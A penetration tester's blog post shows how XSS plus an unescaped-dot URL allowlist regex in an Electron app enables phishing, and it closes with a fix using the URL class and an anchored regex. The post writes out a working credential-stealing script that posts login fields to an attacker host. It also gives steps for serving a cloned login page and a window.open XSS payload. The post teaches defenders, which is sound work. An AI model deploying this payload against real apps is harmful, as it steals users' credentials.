Phishing and credential harvesting in Electron applications

Pavel Shabarkin
8 min read · Mar 30, 2022

Not related to the article

Hey, I am a security consultant and penetration tester from Ukraine 🇺🇦. At the moment I am gathering money to buy ammunition and survival supplies for my friends who are on the front line. I want to stop the madness happening in Ukraine 🇺🇦.

Announcement: The following blog post is dedicated to stopping the madness happening in Ukraine 🇺🇦

TL;DR:

XSS can be particularly devastating to Electron apps, and can result in RCE and phishing that might not be viable in a browser. Electron has features to mitigate these problems, so applications should turn them on.

Even XSS that would be low-impact in the browser can result in highly effective phishing if the application’s URL allowlist is improperly designed. Attacks exploit the Electron model and the application-like presentation of Electron to gain the user’s confidence.

Introduction

It’s fairly common for modern platforms to provide native desktop applications built with the Electron framework. When looking at these, one common attack pattern is achieving RCE within the Electron application by loading malicious content into the desktop window. Electron has mechanisms in place that severely limit what an XSS can do; these are discussed in the next section. However, XSS can also be used specifically to set up a successful phishing campaign and harvest user credentials, without interfering with the legitimate workflow of the application, by relying on users’ trust in native applications.

Companies usually launch their applications on several platforms: web, mobile, and desktop. All of them share the same API. For the example discussed throughout this post, let’s assume the client side of the application is based on the Angular framework. By default, Angular prevents many client-side attacks and blocks the embedding of malicious content. Let’s also assume our theoretical app allows embedding custom scripts and HTML content from any valid source. This functionality exists to let users build custom features on top of their web applications, or to integrate with third-party applications to display dashboards and data. These dashboards can then be shared with other users of the same tenant. Since this is custom code, a malicious user can create a third-party embedded dashboard that contains a simple XSS. If the Electron app is properly integrated, this XSS will have limited, low impact: the content lives on a separate domain, so the same-origin policy (SOP) prevents any cross-domain access and rules out the more interesting attacks. This also assumes that Electron’s security controls are configured correctly and access is limited. But even if RCE is not possible, there are other interesting attacks we can explore and chain with this XSS.

While this example explores an XSS within a third-party dashboard context in Electron, the same attacks apply to XSS found in any other part of the platform’s functionality.

Looking for RCE

At this point we need to verify that the Electron app does not give us the ability to achieve native OS-level RCE. Poorly configured Electron deployments can lead to real problems, such as client-side RCE, and should be a major focus of any Electron app security review.

Electron is based on Chromium, but it is not a browser! Certain principles and security mechanisms implemented by modern browsers are not in place. Electron as a platform wants to maintain a balance of developer usability and security.

The desktop application might have access to the user’s device through Node APIs. The following two configurations are responsible for providing mechanisms to prevent the application JavaScript from having direct access to the user’s device and system level commands.

  • nodeIntegration - is off by default
  • contextIsolation - is on by default

In our example application the following two controls are configured with the default strict security configuration:

nodeIntegration:false

contextIsolation:true

This ensures that our XSS cannot be escalated to OS-level RCE.

Currently there are no direct exploits or bypasses of these controls, meaning that if they are configured strictly, an attacker is out of luck in achieving OS-level remote code execution or gaining access to lower-level APIs.
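For reference, here is a minimal sketch of what these defaults look like when set explicitly at window creation. This is a configuration fragment for a generic Electron main process, not the target application's actual code, and the loaded URL is illustrative:

```javascript
// Sketch only: create a window with the strict defaults the article
// describes set explicitly. Requires the Electron runtime.
const { app, BrowserWindow } = require("electron");

app.whenReady().then(() => {
  const win = new BrowserWindow({
    webPreferences: {
      nodeIntegration: false, // renderer JS gets no direct Node APIs
      contextIsolation: true, // preload scripts isolated from page JS
    },
  });
  win.loadURL("https://subdomain.google.com/"); // illustrative URL
});
```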

Review of the app navigation [regular expression bypass]

After reviewing the above settings, the next interesting area to look at is how the application opens links and renders their content. In our example, the application loads content and links from its own web app inside a desktop window when navigating through Electron. So what happens when third-party links and apps are opened?

Given that most of the code is JavaScript, the easiest way to answer this question is to locate the front-end code responsible for navigation. Taking a look, we find that the desktop application overrides app navigation and implements verification of which content sources can be loaded and embedded within the desktop window:

webContents.on("new-window", function (event, url, disposition, options) {}); // calls the custom openInternally function (declared below)
webContents.on("will-navigate", function (event, url) {}); // calls the custom openInternally function (declared below)

The “new-window” event listener opens new windows depending on the type of link. The “openInternally” function is responsible for determining what type of link was clicked: whether it is part of the application or a third-party, non-embedded link. If the function returns “true”, the application opens the link in the desktop window, on the assumption that it belongs to the platform; if it returns “false”, the application opens the link in the browser as an unassociated third-party resource. Links that belong to the application should open in the desktop app, and anything else should open in the browser, signaling to the user that it is not a direct part of the application and that they should be cautious.
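A hedged sketch of how this gating is commonly wired up, assuming an openInternally(url) helper like the app's (the event names are the ones the app used; newer Electron versions replace "new-window" with setWindowOpenHandler):

```javascript
// Sketch only: route all navigation through the allowlist check.
// Links that fail the check are pushed out to the OS browser.
const { shell } = require("electron");

function attachNavigationGuards(webContents, openInternally) {
  webContents.on("will-navigate", (event, url) => {
    if (!openInternally(url)) {
      event.preventDefault();   // block in-window navigation
      shell.openExternal(url);  // open untrusted link in the browser
    }
  });

  webContents.on("new-window", (event, url) => {
    if (!openInternally(url)) {
      event.preventDefault();
      shell.openExternal(url);
    }
  });
}
```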

Here is simplified pseudo-code to illustrate the problem:

validInternalUrls = ".*((subdomain.google.com)|(subdomain.apple.com)).*" // etc.

function openInternally(url) {
    if (new RegExp(validInternalUrls, "i").test(url)) {
        return true;
    }
    return false;
}

The “openInternally” function uses a regular expression to allowlist URLs that should open in the desktop application. Reviewing the regular expression, we see that the dots are not escaped (\\.), so each dot matches any character. This improper regex exposes an attack vector against users’ trust in the native application: it can be abused to load any domain within an application window, such as the following:

http://subdomain.googleXcom.com

http://subdomainagoogleqcom.com

Try it yourself in the browser:

validInternalUrls = ".*((subdomain.google.com)|(subdomain.apple.com)).*"
var reg = new RegExp(validInternalUrls, "i")
reg.test("subdomain.googlexcom.com") // true

From this point, an attacker could buy and register a domain such as subdomainagoogleqcom.com and host a malicious web application there; the desktop application would consider that source “trusted” and render its content in the desktop window.
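Extending the "try it yourself" snippet, a quick node check of both attacker-registered domains from above against the flawed pattern:

```javascript
// The flawed pattern from the app: unescaped dots match any character,
// and the surrounding ".*" lets the match appear anywhere in the URL.
const validInternalUrls = ".*((subdomain.google.com)|(subdomain.apple.com)).*";
const reg = new RegExp(validInternalUrls, "i");

console.log(reg.test("http://subdomain.googleXcom.com")); // true (bypass)
console.log(reg.test("http://subdomainagoogleqcom.com")); // true (bypass)
console.log(reg.test("https://subdomain.google.com"));    // true (intended)
console.log(reg.test("http://evil.example.com"));         // false
```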

Combining this vulnerability with the XSS assumed to be found in the introduction, we have a great phishing vector for presenting malicious content within an Electron app. Because this is a native app, users place significantly more trust in it than they would in a pop-up in a browser. Thus, by exploiting a stored XSS, users are easily redirected to a web app under the attacker’s control, and if it is properly styled they will never realize they are not interacting with the application they trust.

Setting up the phishing attack

To demonstrate the full extent of this chained XSS and improper URL validation, let’s design a quick phishing attack. As with many modern applications, it is fairly common for sessions to expire or not be carried over, requiring users to sign in again when following a link or accessing other application functionality. For the phishing attack, let’s simulate a link that opens a sign-in dialog using the XSS discovered at the beginning, remembering that the XSS has no access to sessions/cookies or direct access to the API because of SOP controls. If it did, we could abuse it directly, without having to chain it with the improper window-opening functionality.

The HTML page of the main login functionality can be copied into an index.html file. Then we need to find the code responsible for the legitimate callback of the Angular event listener that fires each time a user enters credentials or submits the form. Downloading the JS file and injecting the following code into the listener gets us the desired result.

User credentials can be retrieved with getElementById and then sent to a host under our control. Example code:

console.log("Attention: I am going to steal your credentials");
if (document.getElementById("login-email-input").value !== "" && document.getElementById("login-password-input").value !== "") {
    var xhr = new XMLHttpRequest();
    var params = 'username=' + encodeURIComponent(document.getElementById("login-email-input").value) +
        '&password=' + encodeURIComponent(document.getElementById("login-password-input").value);
    xhr.open("GET", 'https://ourhost.com/credentials?' + params, true);
    xhr.send();
}

Once the above function is added to the legitimate JS file, we need to change which JS file the HTML login page loads, so that any triggered event is sent to the listener under our control (the JS file with our custom code):

<script src="/file.js" defer="defer"></script>
<script src="http://<MY-IP>/file.js" defer="defer"></script>

Deploying the HTML and JS can be done using a simple Python server (sudo python3 -m http.server 80):

  1. index.html (the main login web page of the application, with the source of the file.js script changed to point to our hosted copy)
  2. file.js (the legitimate file.js file, with added forwarding code that sends us the user’s credentials each time they interact with the form)

Due to the discovered XSS vulnerability, any user who visits a page with the stored XSS will automatically see a new desktop window requesting that they log in. This allows phishing a wide range of application users, especially if the XSS can be triggered from a common place such as a dashboard or messages:

<script>
window.open("http://subdomainagoogleqcom.com/index.html")
</script>

The art of the exploit is that the file.js file authenticates the user exactly as the original application does. The user continues interacting with the malicious files within the native application, which is inherently trusted, and will not notice or suspect any malicious activity.

This highlights the underlying problems: the XSS itself, but more specifically, the application’s lack of checks to ensure that the content can or should be loaded within the native application window. If the content is loaded within a native window, the user has no indication that it is malicious, nor any simple way to verify that it is coming from an expected source.

Recommendation

For our example, I would recommend using a well-known URL parser such as the standard URL class (https://developer.mozilla.org/en-US/docs/Web/API/URL/URL) to split the protocol, domain, and path of the link:

new URL('http://www.example.com')
URL {
  hash: ""
  host: "www.example.com"
  hostname: "www.example.com"
  href: "http://www.example.com/"
  origin: "http://www.example.com"
  password: ""
  pathname: "/"
  port: ""
  protocol: "http:"
  search: ""
  searchParams: URLSearchParams {}
  username: ""
}

Then ensure that the protocol is limited to https: and only then pass the host to our openInternally function for further checks:

url = new URL('https://www.example.com')
if (url.protocol === "https:") {
    openInternally(url.host)
}

In our openInternally function, double-check and always triple-validate the regular expression: escape the special characters and anchor the pattern to the full host. (The "i" flag is no longer needed, since the URL class lowercases the host.)

validInternalUrls = "^((subdomain\\.google\\.com)|(subdomain\\.apple\\.com))$" // etc.

function openInternally(url) {
    if (new RegExp(validInternalUrls).test(url)) {
        return true;
    }
    return false;
}

For any native application, developers should always limit user navigation and ensure that only trusted data sources are allowed to be opened.
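Putting the pieces together, here is a sketch of the full recommended check, runnable in node. The host names are the article's examples, and shouldOpenInternally is an illustrative name combining both steps:

```javascript
// Sketch of the recommended flow: parse with the WHATWG URL API,
// require https, then match the host against an anchored,
// dot-escaped allowlist.
const ALLOWED_HOSTS = /^(subdomain\.google\.com|subdomain\.apple\.com)$/;

function shouldOpenInternally(link) {
  let url;
  try {
    url = new URL(link); // throws on malformed input
  } catch (e) {
    return false;
  }
  if (url.protocol !== "https:") return false; // https only
  return ALLOWED_HOSTS.test(url.host);         // exact host match
}

console.log(shouldOpenInternally("https://subdomain.google.com/dashboard")); // true
console.log(shouldOpenInternally("https://subdomain.googlexcom.com/"));      // false
console.log(shouldOpenInternally("http://subdomain.google.com/"));           // false
```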

You can find a complete guide on how to test Electron applications in the references below.

References

  1. https://doyensec.com/resources/Covalence-2020-Carettoni-DemocratizingElectronSecurity.pdf
  2. https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1
  3. https://www.electronjs.org/docs/latest/tutorial/security#13-disable-or-limit-navigation
